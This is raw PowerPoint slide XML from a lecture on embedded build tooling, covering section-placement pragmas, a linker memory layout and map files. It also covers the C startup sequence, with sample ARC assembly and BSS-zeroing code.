              <a:t>pragma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Literals()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Similar construct exists for the assembly language</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33886936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Alternate sections  - example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27651" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="612913" y="1295400"/>
            <a:ext cx="7848600" cy="5355312"/>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LIT1 = 3;		    // mapped to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rodata</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>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Literals(“MYRODATA”)</a:t>
            </a:r>
          </a:p>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LIT2 = 4;		    // mapped to MYRODATA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Literals()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="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BSS(“MYBSS”)</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bss1;		           // mapped to MYBSS</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BSS()</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bss2;			    // mapped to .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="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init_data1 = 4;		    // mapped to .data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Data(“MYDATA”)</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init_data2;	           // mapped to MYDATA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Data()</a:t>
            </a:r>
          </a:p>
          <a:p>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 {}                    // mapped to .text</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Code(“MYCODE”)</a:t>
            </a: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g() {}                    // mapped to MYCODE</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Code()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27861992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a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Locating example #3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ROM: 0 – (128K-1) - 0x00000000 – 0x0001FFFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SRAM: 128K – (132K-1) – 0x00020000 – 0x00020FFF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>DRAM: 1M – (2M-1) – 0x00100000 – 0x001FFFFF</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28676" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="2590800"/>
            <a:ext cx="5715000" cy="39703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128K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   MYSRAM: ORIGIN = 0x00020000 LENGTH = 4K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   MYDRAM: ORIGIN = 0x00100000 LENGTH = 1M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a: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FAST_BSS : {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   } &gt; MYSRAM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MYDRAM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569980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en-US" smtClean="0"/>
              <a:t>Map file</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>The locator can optionally generate a memory map listing (“MAP file”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This file shows the final results of the locating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>for every function / data structure / variable, it can show where it is located in memory and what is its size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This file can be very useful in understanding problems, as well as in the optimization stage of the development</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14743397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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Startup Sequence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11814418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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Startup Sequence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>The startup is a small block of assembly code that prepares the machine for executing a program written in high-level language.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>For each programming language, there may be a different startup code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Also some processor specific initialization:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Zero all core registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Initialize the small-data base register).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5005732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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Startup Sequence (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Initialization for C programs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Zero the uninitialized data (BSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Copy and initialize the data from ROM/Flash to RAM (DATA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Allocate the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Call the main() function in the C code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3000" dirty="0" smtClean="0"/>
              <a:t>By default, the linker links in the default startup code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>The developer needs to supply “main”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>As usual, the developer can create his own startup code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="259233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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Startup Sequence – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="990600"/>
            <a:ext cx="7620000" cy="5016758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="15875">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="squar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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  .extern __</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arc_main</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.text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  .weak	_SDA_BASE_</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  .global	_start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  .type	_start, @function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_start:</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estack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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initialize stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  sub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16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allocate expected call frame</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gp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, _SDA_BASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_ ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>initialize small-data base register</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bl.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arc_main</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fp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0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initialize frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  b	_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit_halt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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.global	_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit_halt</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.type	_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exit_halt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, @function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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exit_halt</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flag	0x01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711177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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="-152400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Startup Sequence – Cont.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="1371600"/>
            <a:ext cx="7467600" cy="49863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arc_main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>() {</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char</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argv</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initcopy</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memset</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fbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 0, _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ebss</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fbss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if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 NULL)</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memset</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0, _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>esbss</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
